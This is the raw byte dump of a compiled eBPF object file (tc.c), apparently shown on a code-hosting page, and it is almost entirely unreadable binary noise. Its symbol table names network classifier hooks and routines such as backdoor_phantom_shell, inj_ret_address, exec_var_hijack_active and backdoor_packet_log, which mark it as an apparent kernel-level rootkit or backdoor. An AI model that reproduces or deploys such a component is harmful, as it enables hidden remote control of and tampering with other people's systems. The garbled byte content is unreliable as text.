$.J\ & Z &.Z <03> <03>~..T - SJ- SJ 0  '.I 8 H<>>.!A <03> @<40><03> <03>X<03>.-!<03>XC<03> 2 <03>.<03> <08>$ .7v<*<G.<.<03> <03> q<> <03><<03> <03> <03> V (K<05>"<14>  <03> <03> <03><03> !  ! !A A1H1<03> <03> <03><EFBFBD><03> <03>t<03>.<2E>!= ! <03> <03>  <03>J<03>  Kq<> 9=G  K<03>~ <03><01>Y<03>~ <03>.<03>~<03> 6<>A  K!<03>~<7E><03><01>Y<03>~ <03> &@)  =<03>~ <03> <03>~X<03> =!!<21>$.<03>~ <03><01>.<03>~ <03><08>.<03>~ <03><01>A<03>~ <03><01><03>~ <03>.<03>~ <03> <03>~ <03>X<  !< $4<03>~<7E><03> Yg!!%$.<03>~ <03> .<03>~ <03> .<03>~ <03><<03>~.<03> :! Y<03>~ <03>.<03>~<7E><03> !Y<03>~ <03> <03>~.<03>  <03>'
"#<03>} <03> <03>}<7D><03> 3.<03>}  <03> <03>}.
<03>fJ<03>} <03> <03>} <03>.<03>}.<03> .<03>} <03> <03>}J<03> <03>X <03>. <03>} <03> B.<03>} <03> <03>}<7D><03>.!<03>} <03>.<03>}X<03> <03>}<<03> <03>}X<03>.-!<03>}XC<03> 2./<08>%<03>}.7<03> *JG<<.&"* ./.!<03>}<08><03> <03>}<<03> <20>"<03>}<*<00><><00>P<00><00>B8<00><00>o<00>
<00>8 <00><00> p`2@<00><00><00><00>g<00>Yp<00>xhJ0*p<00><00><00>Xp_<00><00><00>W(<00><00><00><00>0"<00><00><00>O<00>8`<00><00><00><00><00><00>w<00><00><00><00>x<00>:<00><00>X<00><00>R `<00>hH<00>
 <00> <00><00> <00>h <00>(H<00>"`<00>H <00><00> <00>( p<00> 0:(
:0N0<00>0_0<00>0*0<00>00J0<00>0<00>0 0i0<00>0<00>00e0<00>00<00>0<00>1 1<1o1<00>1<00>131y1<00>1<00>1
3
5
5
6
5&
4+
587M
5T
5[
5g?p
5x
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5
5
5
5'
53
5I
5P
5c
5o=x
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>9
5 
5
5$
50
5Y
5a
5m
5<00>
5<00>
5<00>
5<00>8<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5
5
5#
50
57
5C:L
5T
5`
5l
5x
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>@<00>
5<00>
5<00>
5
5
5"
5*
56
5B
5N
5Z
5f
5w
5~
5<00>><00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5
5
5
5+
52
5E
5f
5w
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5
5
5
5(
55
5B
5O
5\
5i
5v
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5
5
5#
50
5M
5[
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5
5-
5:
5V
5c
5r
5
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5
5
5"
5/
5<
5I
5V
5c
5p
5~
5<00>
5<00>
5<00>
5)
5X
5d
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5
5
5
5
5
5%
5,
53
5:
5K
5Q
5W
5]
5i
5q
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5
5
5
5
5,
58
5D
5S
5b
5q
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5
5 0
5*
2.
5=
5H
2L
5W
2[
5f
2j
5u
2y
5<00>
2<00>
5<00>
5<00>
5<00>
2<00>
5<00>
2<00>
5<00>
2<00>
5<00>
2<00>
5<00>
2<00>
5<00>
2<00>
5
2
5
2
5!
2%
50
5;
5F
5Q
5\
2`
5k
2o
5z
5<00>
2<00>
5<00>
5<00>0<00>
5<00>0<00>
2<00>
5<00>
4<00>
5<00>0<00>
5 0
5(
41
5=
4F
5R
4[
5g
4p
5|0<00>
5<00>0<00>
5<00>0<00>
5<00>
4<00>
5<00>
4<00>
5<00>
4
5 0
5(08
5D0T
5`0p
5|0<00>
5<00>0<00>
5<00>0<00>
2<00>
5<00>0<00>
5<00>0<00>
5 0
5%05
5A0Q
5_1m
5y
2}
5<00>
2<00>
5<00>
2<00>
5<00>
2<00>
5<00>
2<00>
5<00>
2<00>
5<00>
2<00>
5<00>
2<00>
5<00>
2<00>
5 
4
51.
5;1H
2L
5Y
4a
5n1~
5<00>1<00>
5<00>1<00>
5<00>
4<00>
5<00>
4<00>
5<00>
4<00>
51
5!
4)
58
5@
5L
5X
500000080@0H0P0X0`0h0p0x0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>000 0(00080@0H0P0X0`0h0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>1<00>1<00>1<00>111 1(1@1H1P1X1`1h1<00>1<00>1<00>1<00>1<00>1<00>1<00>1<00>1<00>1<00>1<00>1<00>100 1(1<00>:<00>?<00>=<00>9<00>8<00>@<00>> 7,0<1P0`0p0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>000 000@0P0`0p0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>000 000@0P0`0p0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>000 000@0P0`0p0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>000 000@0P0`0p0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>000 000@0P0`0p0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>000 000@0P0`0p0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>000 000@0P0`0p0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>000 000@0P0`0p0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>0 0 0 00 0@ 0P 0` 0p 0<00> 0<00> 0<00> 0<00> 0<00> 0<00> 0<00> 0<00> 0
0
0(
18
1H
1X
1h
1x
1<00>
1<00>
1<00>
1<00>
1<00>
1<00>
1<00>
1<00>
1 1 1( 18 1H 1X 1h 1x 1<00> 1<00> 1<00> 1<00> 1<00> 1<00> 1<00> 1<00> 1 1 1( 18 1H 1X 1h 1x 1<00> 1<00> 1<00> 1<00> 1<00> 1<00> 1<00> 1<00> 1 1 1( 18 1H 1X 1h 1081_0<00>1.debug_abbrev.text.rel.BTF.extclassifier_ingressclassifier/ingressclassifier_egress.relclassifier/egressinj_ret_address.maps.rel.debug_ranges.debug_str.rel.debug_infofs_openbackdoor_phantom_shellfs_dir_logexec_var_hijack_active_license.rel.debug_line.rel.eh_frame.rel.debug_loctc.c.strtab.symtab.rel.BTFLBB1_9LBB0_59LBB0_49LBB0_39LBB0_29LBB0_19LBB0_68LBB0_38LBB1_7LBB0_7LBB0_67LBB0_57LBB0_47LBB0_37LBB0_27LBB0_17LBB0_66LBB0_36LBB0_26backdoor_packet_log_16LBB1_16.rodata.str1.16LBB1_5LBB0_5LBB0_65LBB0_55LBB0_35LBB0_25LBB1_15LBB0_15LBB0_34LBB1_3LBB0_3LBB0_63LBB0_33LBB0_23LBB1_13LBB0_13LBB1_2LBB0_52backdoor_packet_log_32LBB0_61LBB0_51LBB0_31LBB0_21LBB1_11LBB0_11.rodata.str1.1LBB0_50LBB0_20/<00><><00>@^@<00>Z <00><> 5<00>`<00>28"0<00>h"<00><00>2P#2<00><00>'<00>'  <00><00>
<00>0<00><00>2}<00> <00><>` <00>5G@<00> @<40><00><00>0uJ<00>
C<00>T<00>? <00><><00><00>tx  `<60>@ @<40>P  <00><> <00><>2<00> <00><> 7Ȉ7
Reference in New Issue Copy Permalink